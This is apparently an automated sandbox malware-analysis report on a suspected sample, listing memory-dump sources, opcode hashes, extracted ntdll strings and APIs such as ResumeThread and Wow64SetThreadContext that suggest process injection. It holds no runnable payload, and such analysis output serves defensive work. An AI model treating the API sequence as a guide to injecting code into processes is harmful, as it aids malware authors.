                                        • Instruction ID: e5e1d59b7a5391fa34690217ca6fc43f2a4c86ede89356dc6a79a767386c4dc7
                                        • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                        • Instruction Fuzzy Hash: 2DE09B316403508BCB258A1EC140A93B7E8DFB5660F56806FE90547762C231F842C6D4
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                        • Instruction ID: 200dee10f79b934d40b622338944f1a4c61a4cf99c1c2af9e997805db450b5d6
                                        • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                        • Instruction Fuzzy Hash: B6D012371D065DBBCB119F66DC01F957BA9E764BA0F444020B505875A0C63AE960D584
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1554908d232c68737c69f27c80849d42ca4829713a43f315d3599e20b698b239
                                        • Instruction ID: 51e132bf9ba991c86af2a9e7805c5db5b0b9eed3309fffabfdfe4c4a28d88f97
                                        • Opcode Fuzzy Hash: 1554908d232c68737c69f27c80849d42ca4829713a43f315d3599e20b698b239
                                        • Instruction Fuzzy Hash: A1D05E30A01112CBEF17CB49C554A2A36B0EB10641B4000B9EA0152270E334D8018A50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                        • Instruction ID: 6f8f25483ec68ab08251e82f6d3268aecc7e1ec5021053d89a73759dd3243db6
                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                        • Instruction Fuzzy Hash: 0FD09235312A80CFD61A8B0CC5A8B1533E4BB84A48F854490E441CBB62D66CD940CA00
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                        • Instruction ID: f1c3524bd21b6e45ded11d44a287c2fa7f6a329415de73d34ea7de9bdcb6c064
                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                        • Instruction Fuzzy Hash: 78C01232290648AFCB12AA99CD01F027BA9EBA8B40F000061F2058B6B0C631E820EA84
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                        • Instruction ID: 137c9da3f989d939e5e17def3e5c7cd798e7ef388b554db7d935508d4e1921b3
                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                        • Instruction Fuzzy Hash: C7D01236100248EFCB05DF55C890D9A772BFBD8710F148019FD19076118A31ED62DA50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                        • Instruction ID: 1ca71fe9ad33c78fb7dfa3979c4a275f0cbc093e283a50c4bb1eb14d20cd0328
                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                        • Instruction Fuzzy Hash: 25C04879701A568FDF16DB6ED298F4A77E4FB44744F1508D0E805DBB22EA24E841CA10
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61d19c6450e12d4585b2ee5f1f12c310d2d0672850c0f1bf5e4f75cf464f81a9
                                        • Instruction ID: 11009dd582896dcd0a72843780a56da12d75602eac7882c38278248c1e636e5c
                                        • Opcode Fuzzy Hash: 61d19c6450e12d4585b2ee5f1f12c310d2d0672850c0f1bf5e4f75cf464f81a9
                                        • Instruction Fuzzy Hash: 829002316058111291407158488554A4045ABF0301B95C012E0424555CCF248A965361
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fcae67302791a7138045c66c1c6a15f465904ffa1cc8f319f5468c3e6d4e8624
                                        • Instruction ID: 4e283ccb524ebf43c5d5426c8b802bac9bc5626f6629f5249340cc21cb10da2b
                                        • Opcode Fuzzy Hash: fcae67302791a7138045c66c1c6a15f465904ffa1cc8f319f5468c3e6d4e8624
                                        • Instruction Fuzzy Hash: 3E9002616015114241407158480540A6045ABF13013D5C116E0554561CCB2889959369
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad952f70be74aa1ecfd92c902af5041960ed462e1a4fedb0c4382e69ebcf301a
                                        • Instruction ID: 2c62a738f70398b71d84b095cc4f064f0a2fb216ba29b182a7c35f6eb3dc36e1
                                        • Opcode Fuzzy Hash: ad952f70be74aa1ecfd92c902af5041960ed462e1a4fedb0c4382e69ebcf301a
                                        • Instruction Fuzzy Hash: 7390023120545942D14071584405A4A00559BE0305F95C012E0064695DDB358E95B761
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b474bb6462f5616b699dd3e3dca9c7aecbe03f391dba2e183be150a23926eff7
                                        • Instruction ID: 4acaebf85fea0e02c5eadcc458e9b0be65524891a57f8bfdb8a2665d46f2ac8c
                                        • Opcode Fuzzy Hash: b474bb6462f5616b699dd3e3dca9c7aecbe03f391dba2e183be150a23926eff7
                                        • Instruction Fuzzy Hash: 0090023120141902D1807158440564E00459BE1301FD5C016E0025655DCF258B9977A1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5da597f38c02b38b36c627f08cc86605f6c231db025cea10796148e53c972b40
                                        • Instruction ID: e9875ec9c1136c7b0c621c0275fcc36a7cf15454f4e9c2f61de554cdccac1dec
                                        • Opcode Fuzzy Hash: 5da597f38c02b38b36c627f08cc86605f6c231db025cea10796148e53c972b40
                                        • Instruction Fuzzy Hash: 7B90023120141902D1047158480568A00459BE0301F95C012E6024656EDB7589D17231
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e648d092808889a14bc69e1507543b484566d6af4c85a28452a02b7516e8a54c
                                        • Instruction ID: 18f68960f8c9cf23d367df545f923be22c98ba2045b6d5f3649ce81727d3d602
                                        • Opcode Fuzzy Hash: e648d092808889a14bc69e1507543b484566d6af4c85a28452a02b7516e8a54c
                                        • Instruction Fuzzy Hash: 4B90023160541902D1507158441574A00459BE0301F95C012E0024655DCB658B9577A1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e984cb5b7415402585f0dbdade9c1cf694fee1159469eee7febe6afd97da209e
                                        • Instruction ID: 63e092eae401d43e078d29dd8ae684b884cdaeaab6ccad13e3e41c45adc19085
                                        • Opcode Fuzzy Hash: e984cb5b7415402585f0dbdade9c1cf694fee1159469eee7febe6afd97da209e
                                        • Instruction Fuzzy Hash: 89900225211411030105B558070550B00869BE5351395C022F1015551CDB3189A15221
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8bae4a6072f9ced3ccbb608f2543c6178e2d4ba68492b25935a91ec112f86252
                                        • Instruction ID: 7d7c746ae1e9ffc4ef85ffa94319784f74d8bee95169ab2e40e0ed0d8ff8732c
                                        • Opcode Fuzzy Hash: 8bae4a6072f9ced3ccbb608f2543c6178e2d4ba68492b25935a91ec112f86252
                                        • Instruction Fuzzy Hash: 6E900225221411020145B558060550F0485ABE63513D5C016F1416591CCB3189A55321
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8dd043f0655540897a1b99a8a1b36e279cd1a878467c749c47d02642ddb3855
                                        • Instruction ID: 688db5ee8bdb0775abc2470fc7a90b4b89c67b1208fc1bca1579637f6d2b51cf
                                        • Opcode Fuzzy Hash: d8dd043f0655540897a1b99a8a1b36e279cd1a878467c749c47d02642ddb3855
                                        • Instruction Fuzzy Hash: 7C9002A1201551924500B2588405B0E45459BF0201B95C017E1054561CCA3589919235
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06d20005889d082c45fb4a6cec7c9f788889a00e53d71b850a873d80df5ff5fa
                                        • Instruction ID: 915fce549cdd4a1673146e1db11d9aed06a6f71fda0862194c72b3b2df370fdd
                                        • Opcode Fuzzy Hash: 06d20005889d082c45fb4a6cec7c9f788889a00e53d71b850a873d80df5ff5fa
                                        • Instruction Fuzzy Hash: C390022120545542D10075585409A0A00459BE0205F95D012E1064596DCB358991A231
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2debca2b591194329d900bd7c5364bc8ffd4958571ef207afe43ae323c74316
                                        • Instruction ID: 0efd6e23d214f6db36ea9595dce118b5bf52e71f9534d32e2794253d0ce0bbfc
                                        • Opcode Fuzzy Hash: c2debca2b591194329d900bd7c5364bc8ffd4958571ef207afe43ae323c74316
                                        • Instruction Fuzzy Hash: 9290022921341102D1807158540960E00459BE1202FD5D416E0015559CCE2589A95321
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e69498545271a8cb7a57ab517de11c9f63cc918af5c30a6dc82653f4c0fc91fe
                                        • Instruction ID: 14aaf7c2a2cbd49d0394e43358893699ddfe68e329c31ee75eb9f55aa7f99079
                                        • Opcode Fuzzy Hash: e69498545271a8cb7a57ab517de11c9f63cc918af5c30a6dc82653f4c0fc91fe
                                        • Instruction Fuzzy Hash: D690022130141103D1407158541960A4045EBF1301F95D012E0414555CDE2589965322
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5881365d22ce2f0c363377e842865b430f6a5cad5ee6e28e4f9e1e27c8ded426
                                        • Instruction ID: b33f7b66dfc4fdcad82571de4817a34bdfc1406293e13c8ea65631c5384197d8
                                        • Opcode Fuzzy Hash: 5881365d22ce2f0c363377e842865b430f6a5cad5ee6e28e4f9e1e27c8ded426
                                        • Instruction Fuzzy Hash: 2E900221242452525545B158440550B4046ABF02417D5C013E1414951CCA369996D721
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d83d809a1317842ff6534e03dfba2336f4c9de074fd1eaa1be7dbd95a786a340
                                        • Instruction ID: 1fee5f940881aafbdf5500c12992a06c36ccf5cb35e22b61b330c61c3b77c7cd
                                        • Opcode Fuzzy Hash: d83d809a1317842ff6534e03dfba2336f4c9de074fd1eaa1be7dbd95a786a340
                                        • Instruction Fuzzy Hash: 3C90023124141502D1417158440560A0049ABE0241FD5C013E0424555ECB658B96AB61
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 193a6b60fdceb0db25ac81c6c69684cd4dae64447d950d72f9f60b9ff5babf62
                                        • Instruction ID: 1e3f3040356f96e633398d757f6cbcc65a88c2e4d7c4737ae08a965674921749
                                        • Opcode Fuzzy Hash: 193a6b60fdceb0db25ac81c6c69684cd4dae64447d950d72f9f60b9ff5babf62
                                        • Instruction Fuzzy Hash: B690023120141942D10071584405B4A00459BF0301F95C017E0124655DCB25C9917621
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17079b87d0b24ae5cc4a18f8174e77548a7ae420d4840b707d43c012e8ec18e8
                                        • Instruction ID: abf2e956363cd33a31764c3780a6bcd942ed3610d0593ff70f8e5c3911312090
                                        • Opcode Fuzzy Hash: 17079b87d0b24ae5cc4a18f8174e77548a7ae420d4840b707d43c012e8ec18e8
                                        • Instruction Fuzzy Hash: 5A90022160541502D1407158541970A00559BE0201F95D012E0024555DCB698B9567A1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7480f1533ae9822e8f21394d6183a3777c14528c9ea213589a708175118c14da
                                        • Instruction ID: 4f6e0e9000d1127d67662dd0b56ef88050fd08eeb7a6f346c40292f6c2ab050f
                                        • Opcode Fuzzy Hash: 7480f1533ae9822e8f21394d6183a3777c14528c9ea213589a708175118c14da
                                        • Instruction Fuzzy Hash: 2590023120141503D1007158550970B00459BE0201F95D412E0424559DDB6689916221
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43fa5a11307759a65bba0f2701d62df4ebde044a75ab4dab18bce1aaf63454c4
                                        • Instruction ID: 2a33f86236f69ed98554ae281a18f639648b1e7f79cea17d56d47001610d03f3
                                        • Opcode Fuzzy Hash: 43fa5a11307759a65bba0f2701d62df4ebde044a75ab4dab18bce1aaf63454c4
                                        • Instruction Fuzzy Hash: 5E90023120141502D1007598540964A00459BF0301F95D012E5024556ECB7589D16231
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a49327b80663453f1e71d0b9a4ed782c65f25374d3c007bd91cd307b0a2ba27a
                                        • Instruction ID: 21f139c34a9e0596791523c092c63807a151bde98899be7d57a655ef3a493c46
                                        • Opcode Fuzzy Hash: a49327b80663453f1e71d0b9a4ed782c65f25374d3c007bd91cd307b0a2ba27a
                                        • Instruction Fuzzy Hash: 8490026121141142D1047158440570A00859BF1201F95C013E2154555CCA398DA15225
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                        • API String ID: 48624451-2108815105
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                        • API String ID: 48624451-2108815105
                                        Strings
                                        • Execute=1, xrefs: 01444713
                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01444655
                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01444742
                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01444787
                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014446FC
                                        • ExecuteOptions, xrefs: 014446A0
                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01444725
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                        • API String ID: 0-484625025
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: __aulldvrm
                                        • String ID: +$-$0$0
                                        • API String ID: 1302938615-699404926
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: %%%u$[$]:%u
                                        • API String ID: 48624451-2819853543
                                        Strings
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014402BD
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014402E7
                                        • RTL: Re-Waiting, xrefs: 0144031E
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                        • API String ID: 0-2474120054
                                        Strings
                                        • RTL: Resource at %p, xrefs: 01447B8E
                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01447B7F
                                        • RTL: Re-Waiting, xrefs: 01447BAC
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 0-871070163
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0144728C
                                        Strings
                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01447294
                                        • RTL: Resource at %p, xrefs: 014472A3
                                        • RTL: Re-Waiting, xrefs: 014472C1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 885266447-605551621
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: %%%u$]:%u
                                        • API String ID: 48624451-3050659472
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: __aulldvrm
                                        • String ID: +$-
                                        • API String ID: 1302938615-2137968064
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $$@
                                        • API String ID: 0-1194432280

                                        Execution Graph

                                        Execution Coverage:11.4%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:230
                                        Total number of Limit Nodes:14

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2325751895.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7290000_BPSHhDGmARC.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927

                                        Control-flow Graph

                                        APIs
                                        • ResumeThread.KERNELBASE ref: 0723B432
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0723B4FE
                                        Memory Dump Source
